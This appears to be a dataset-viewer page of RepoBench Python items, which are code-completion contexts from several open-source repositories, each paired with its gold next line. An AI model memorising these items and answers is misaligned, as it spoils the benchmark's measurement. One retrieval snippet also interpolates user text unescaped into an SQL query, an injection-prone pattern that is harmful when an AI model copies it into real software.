from easyvolcap.scripts.main import test # will do everything a normal user would do
from easyvolcap.engine import cfg
from easyvolcap.engine import SAMPLERS
from easyvolcap.runners.volumetric_video_runner import VolumetricVideoRunner
import sys
import torch
import argparse | 690 | # This function will try to invoke evc programmatically
@catch_throw
def main():
# fmt: off
sys.path.append('.')
sep_ind = sys.argv.index('--')
our_args = sys.argv[1:sep_ind]
evv_args = sys.argv[sep_ind + 1:]
sys.argv = [sys.argv[0]] + ['-t','test'] + evv_args
parser = argparse.ArgumentParser()
parser.add_argument('--sampler', type=str, default='SuperChargedR4DVB')
parser.add_argument('--sub_sampler', type=str, default='SuperChargedR4DV')
parser.add_argument('--exp_name', type=str, default='scr4dvb_dance3')
parser.add_argument('--save_fp32', action='store_true')
parser.add_argument('--save_pt', action='store_true')
parser.add_argument('--no_save_npz', action='store_false', dest='save_npz')
args = parser.parse_args(our_args)
# You have to save at least one type of model
| # This function will try to invoke evc programmatically
@catch_throw
def main():
# fmt: off
sys.path.append('.')
sep_ind = sys.argv.index('--')
our_args = sys.argv[1:sep_ind]
evv_args = sys.argv[sep_ind + 1:]
sys.argv = [sys.argv[0]] + ['-t','test'] + evv_args
parser = argparse.ArgumentParser()
parser.add_argument('--sampler', type=str, default='SuperChargedR4DVB')
parser.add_argument('--sub_sampler', type=str, default='SuperChargedR4DV')
parser.add_argument('--exp_name', type=str, default='scr4dvb_dance3')
parser.add_argument('--save_fp32', action='store_true')
parser.add_argument('--save_pt', action='store_true')
parser.add_argument('--no_save_npz', action='store_false', dest='save_npz')
args = parser.parse_args(our_args)
# You have to save at least one type of model | assert args.save_pt or args.save_npz | 1 | 2023-10-17 04:48:46+00:00 | 2k |
pchunduri6/rag-demystified | complex_qa.py | [
{
"identifier": "generate_subquestions",
"path": "subquestion_generator.py",
"snippet": "def generate_subquestions(\n question,\n file_names: List[str] = None,\n system_prompt=DEFAULT_SUBQUESTION_GENERATOR_PROMPT,\n user_task=DEFAULT_USER_TASK,\n llm_model=\"gpt-4-0613\",\n):\n \"\"\"G... | import os
import requests
import warnings
import evadb
from dotenv import load_dotenv
from pathlib import Path
from subquestion_generator import generate_subquestions
from openai_utils import llm_call | 1,593 |
warnings.filterwarnings("ignore")
if not load_dotenv():
print(
"Could not load .env file or it is empty. Please check if it exists and is readable."
)
exit(1)
def generate_vector_stores(cursor, docs):
"""Generate a vector store for the docs using evadb.
"""
for doc in docs:
print(f"Creating vector store for {doc}...")
cursor.query(f"DROP TABLE IF EXISTS {doc};").df()
cursor.query(f"LOAD DOCUMENT 'data/{doc}.txt' INTO {doc};").df()
evadb_path = os.path.dirname(evadb.__file__)
cursor.query(
f"""CREATE FUNCTION IF NOT EXISTS SentenceFeatureExtractor
IMPL '{evadb_path}/functions/sentence_feature_extractor.py';
""").df()
cursor.query(
f"""CREATE TABLE IF NOT EXISTS {doc}_features AS
SELECT SentenceFeatureExtractor(data), data FROM {doc};"""
).df()
cursor.query(
f"CREATE INDEX IF NOT EXISTS {doc}_index ON {doc}_features (features) USING FAISS;"
).df()
print(f"Successfully created vector store for {doc}.")
def vector_retrieval(cursor, llm_model, question, doc_name):
"""Returns the answer to a factoid question using vector retrieval.
"""
res_batch = cursor.query(
f"""SELECT data FROM {doc_name}_features
ORDER BY Similarity(SentenceFeatureExtractor('{question}'),features)
LIMIT 3;"""
).df()
context_list = []
for i in range(len(res_batch)):
context_list.append(res_batch["data"][i])
context = "\n".join(context_list)
user_prompt = f"""You are an assistant for question-answering tasks.
Use the following pieces of retrieved context to answer the question.
If you don't know the answer, just say that you don't know.
Use three sentences maximum and keep the answer concise.
Question: {question}
Context: {context}
Answer:"""
|
warnings.filterwarnings("ignore")
if not load_dotenv():
print(
"Could not load .env file or it is empty. Please check if it exists and is readable."
)
exit(1)
def generate_vector_stores(cursor, docs):
"""Generate a vector store for the docs using evadb.
"""
for doc in docs:
print(f"Creating vector store for {doc}...")
cursor.query(f"DROP TABLE IF EXISTS {doc};").df()
cursor.query(f"LOAD DOCUMENT 'data/{doc}.txt' INTO {doc};").df()
evadb_path = os.path.dirname(evadb.__file__)
cursor.query(
f"""CREATE FUNCTION IF NOT EXISTS SentenceFeatureExtractor
IMPL '{evadb_path}/functions/sentence_feature_extractor.py';
""").df()
cursor.query(
f"""CREATE TABLE IF NOT EXISTS {doc}_features AS
SELECT SentenceFeatureExtractor(data), data FROM {doc};"""
).df()
cursor.query(
f"CREATE INDEX IF NOT EXISTS {doc}_index ON {doc}_features (features) USING FAISS;"
).df()
print(f"Successfully created vector store for {doc}.")
def vector_retrieval(cursor, llm_model, question, doc_name):
"""Returns the answer to a factoid question using vector retrieval.
"""
res_batch = cursor.query(
f"""SELECT data FROM {doc_name}_features
ORDER BY Similarity(SentenceFeatureExtractor('{question}'),features)
LIMIT 3;"""
).df()
context_list = []
for i in range(len(res_batch)):
context_list.append(res_batch["data"][i])
context = "\n".join(context_list)
user_prompt = f"""You are an assistant for question-answering tasks.
Use the following pieces of retrieved context to answer the question.
If you don't know the answer, just say that you don't know.
Use three sentences maximum and keep the answer concise.
Question: {question}
Context: {context}
Answer:"""
| response, cost = llm_call(model=llm_model, user_prompt=user_prompt) | 1 | 2023-10-18 16:32:51+00:00 | 2k |
predibase/lorax | server/lorax_server/utils/sources/hub.py | [
{
"identifier": "BaseModelSource",
"path": "server/lorax_server/utils/sources/source.py",
"snippet": "class BaseModelSource:\n def remote_weight_files(self, extension: str = None):\n raise NotImplementedError\n\n def weight_files(self, extension: str = None):\n raise NotImplementedEr... | import time
import os
from datetime import timedelta
from loguru import logger
from pathlib import Path
from typing import Optional, List
from huggingface_hub import HfApi, hf_hub_download
from huggingface_hub.constants import HUGGINGFACE_HUB_CACHE
from huggingface_hub.utils import (
LocalEntryNotFoundError,
EntryNotFoundError,
RevisionNotFoundError, # Import here to ease try/except in other part of the lib
)
from .source import BaseModelSource, try_to_load_from_cache | 1,180 |
WEIGHTS_CACHE_OVERRIDE = os.getenv("WEIGHTS_CACHE_OVERRIDE", None)
def get_hub_model_local_dir(model_id: str) -> Path:
object_id = model_id.replace("/", "--")
repo_cache = Path(HUGGINGFACE_HUB_CACHE) / f"models--{object_id}"
return repo_cache
def weight_hub_files(
model_id: str, revision: Optional[str] = None, extension: str = ".safetensors"
) -> List[str]:
"""Get the weights filenames on the hub"""
api = HfApi()
info = api.model_info(model_id, revision=revision)
filenames = [
s.rfilename
for s in info.siblings
if s.rfilename.endswith(extension)
and len(s.rfilename.split("/")) == 1
and "arguments" not in s.rfilename
and "args" not in s.rfilename
and "training" not in s.rfilename
]
if not filenames:
raise EntryNotFoundError(
f"No {extension} weights found for model {model_id} and revision {revision}.",
None,
)
return filenames
def weight_files(
model_id: str, revision: Optional[str] = None, extension: str = ".safetensors"
) -> List[Path]:
"""Get the local files"""
# Local model
if Path(model_id).exists() and Path(model_id).is_dir():
local_files = list(Path(model_id).glob(f"*{extension}"))
if not local_files:
raise FileNotFoundError(
f"No local weights found in {model_id} with extension {extension}"
)
return local_files
try:
filenames = weight_hub_files(model_id, revision, extension)
except EntryNotFoundError as e:
if extension != ".safetensors":
raise e
# Try to see if there are pytorch weights
pt_filenames = weight_hub_files(model_id, revision, extension=".bin")
# Change pytorch extension to safetensors extension
# It is possible that we have safetensors weights locally even though they are not on the
# hub if we converted weights locally without pushing them
filenames = [
f"{Path(f).stem.lstrip('pytorch_')}.safetensors" for f in pt_filenames
]
if WEIGHTS_CACHE_OVERRIDE is not None:
files = []
for filename in filenames:
p = Path(WEIGHTS_CACHE_OVERRIDE) / filename
if not p.exists():
raise FileNotFoundError(
f"File {p} not found in {WEIGHTS_CACHE_OVERRIDE}."
)
files.append(p)
return files
repo_cache = get_hub_model_local_dir(model_id)
files = []
for filename in filenames:
|
WEIGHTS_CACHE_OVERRIDE = os.getenv("WEIGHTS_CACHE_OVERRIDE", None)
def get_hub_model_local_dir(model_id: str) -> Path:
object_id = model_id.replace("/", "--")
repo_cache = Path(HUGGINGFACE_HUB_CACHE) / f"models--{object_id}"
return repo_cache
def weight_hub_files(
model_id: str, revision: Optional[str] = None, extension: str = ".safetensors"
) -> List[str]:
"""Get the weights filenames on the hub"""
api = HfApi()
info = api.model_info(model_id, revision=revision)
filenames = [
s.rfilename
for s in info.siblings
if s.rfilename.endswith(extension)
and len(s.rfilename.split("/")) == 1
and "arguments" not in s.rfilename
and "args" not in s.rfilename
and "training" not in s.rfilename
]
if not filenames:
raise EntryNotFoundError(
f"No {extension} weights found for model {model_id} and revision {revision}.",
None,
)
return filenames
def weight_files(
model_id: str, revision: Optional[str] = None, extension: str = ".safetensors"
) -> List[Path]:
"""Get the local files"""
# Local model
if Path(model_id).exists() and Path(model_id).is_dir():
local_files = list(Path(model_id).glob(f"*{extension}"))
if not local_files:
raise FileNotFoundError(
f"No local weights found in {model_id} with extension {extension}"
)
return local_files
try:
filenames = weight_hub_files(model_id, revision, extension)
except EntryNotFoundError as e:
if extension != ".safetensors":
raise e
# Try to see if there are pytorch weights
pt_filenames = weight_hub_files(model_id, revision, extension=".bin")
# Change pytorch extension to safetensors extension
# It is possible that we have safetensors weights locally even though they are not on the
# hub if we converted weights locally without pushing them
filenames = [
f"{Path(f).stem.lstrip('pytorch_')}.safetensors" for f in pt_filenames
]
if WEIGHTS_CACHE_OVERRIDE is not None:
files = []
for filename in filenames:
p = Path(WEIGHTS_CACHE_OVERRIDE) / filename
if not p.exists():
raise FileNotFoundError(
f"File {p} not found in {WEIGHTS_CACHE_OVERRIDE}."
)
files.append(p)
return files
repo_cache = get_hub_model_local_dir(model_id)
files = []
for filename in filenames: | cache_file = try_to_load_from_cache( | 1 | 2023-10-20 18:19:49+00:00 | 2k |
codefuse-ai/Test-Agent | chat/server/monitor/clean_chat_data.py | [
{
"identifier": "NUM_SERVERS",
"path": "chat/server/monitor/basic_stats.py",
"snippet": "NUM_SERVERS = 14"
},
{
"identifier": "to_openai_format",
"path": "chat/server/monitor/clean_battle_data.py",
"snippet": "def to_openai_format(messages):\n roles = [\"user\", \"assistant\"]\n re... | import argparse
import datetime
import json
import os
import time
from pytz import timezone
from tqdm import tqdm
from chat.server.monitor.basic_stats import NUM_SERVERS
from chat.server.monitor.clean_battle_data import (
to_openai_format,
replace_model_name,
)
from chat.utils import detect_language | 854 | """
Clean chatbot arena chat log.
Usage:
python3 clean_chat_data.py --mode conv_release
"""
NETWORK_ERROR_MSG = (
"NETWORK ERROR DUE TO HIGH TRAFFIC. PLEASE REGENERATE OR REFRESH THIS PAGE.".lower()
)
def get_log_files(max_num_files=None):
dates = []
for month in [4, 5, 6, 7]:
for day in range(1, 32):
dates.append(f"2023-{month:02d}-{day:02d}")
for month in [8]:
for day in range(1, 32):
dates.append(f"2023-{month:02d}-{day:02d}")
filenames = []
for d in dates:
for i in range(NUM_SERVERS):
name = os.path.expanduser(f"~/fastchat_logs/server{i}/{d}-conv.json")
if os.path.exists(name):
filenames.append(name)
max_num_files = max_num_files or len(filenames)
# filenames = list(reversed(filenames))
filenames = filenames[-max_num_files:]
return filenames
def clean_chat_data(log_files):
raw_data = []
for filename in tqdm(log_files, desc="read files"):
for retry in range(5):
try:
lines = open(filename).readlines()
break
except FileNotFoundError:
time.sleep(2)
for l in lines:
row = json.loads(l)
if row["type"] == "chat":
raw_data.append(row)
all_models = set()
all_ips = dict()
chats = []
ct_invalid_conv_id = 0
ct_invalid = 0
ct_network_error = 0
for row in raw_data:
if "conv_id" not in row["state"]:
ct_invalid_conv_id += 1
continue
conversation_id = row["state"]["conv_id"]
if conversation_id is None:
ct_invalid_conv_id += 1
continue
state = row["state"]
| """
Clean chatbot arena chat log.
Usage:
python3 clean_chat_data.py --mode conv_release
"""
NETWORK_ERROR_MSG = (
"NETWORK ERROR DUE TO HIGH TRAFFIC. PLEASE REGENERATE OR REFRESH THIS PAGE.".lower()
)
def get_log_files(max_num_files=None):
dates = []
for month in [4, 5, 6, 7]:
for day in range(1, 32):
dates.append(f"2023-{month:02d}-{day:02d}")
for month in [8]:
for day in range(1, 32):
dates.append(f"2023-{month:02d}-{day:02d}")
filenames = []
for d in dates:
for i in range(NUM_SERVERS):
name = os.path.expanduser(f"~/fastchat_logs/server{i}/{d}-conv.json")
if os.path.exists(name):
filenames.append(name)
max_num_files = max_num_files or len(filenames)
# filenames = list(reversed(filenames))
filenames = filenames[-max_num_files:]
return filenames
def clean_chat_data(log_files):
raw_data = []
for filename in tqdm(log_files, desc="read files"):
for retry in range(5):
try:
lines = open(filename).readlines()
break
except FileNotFoundError:
time.sleep(2)
for l in lines:
row = json.loads(l)
if row["type"] == "chat":
raw_data.append(row)
all_models = set()
all_ips = dict()
chats = []
ct_invalid_conv_id = 0
ct_invalid = 0
ct_network_error = 0
for row in raw_data:
if "conv_id" not in row["state"]:
ct_invalid_conv_id += 1
continue
conversation_id = row["state"]["conv_id"]
if conversation_id is None:
ct_invalid_conv_id += 1
continue
state = row["state"] | conversation = to_openai_format(state["messages"][state["offset"] :]) | 1 | 2023-10-20 08:56:20+00:00 | 2k |
Subsets and Splits
SQL Console for tianyang/repobench_python_v1.1
Identifies repositories that have consistent code formatting levels across multiple scales (2k, 4k, 8k, 12k) and reveals the structured formatting patterns within these repositories.
SQL Console for tianyang/repobench_python_v1.1
Compares cross-file and in-file code structure patterns across different complexity levels, revealing how file organization strategies vary with code size and potentially informing better code architecture decisions.
SQL Console for tianyang/repobench_python_v1.1
Identifies repositories that have complete performance data across all seven code complexity levels, revealing consistent benchmarking patterns across different code sizes.
SQL Console for tianyang/repobench_python_v1.1
Identifies repositories that contain all 7 distinct quality levels (2k through 32k), revealing complete datasets that might be useful for comprehensive analysis.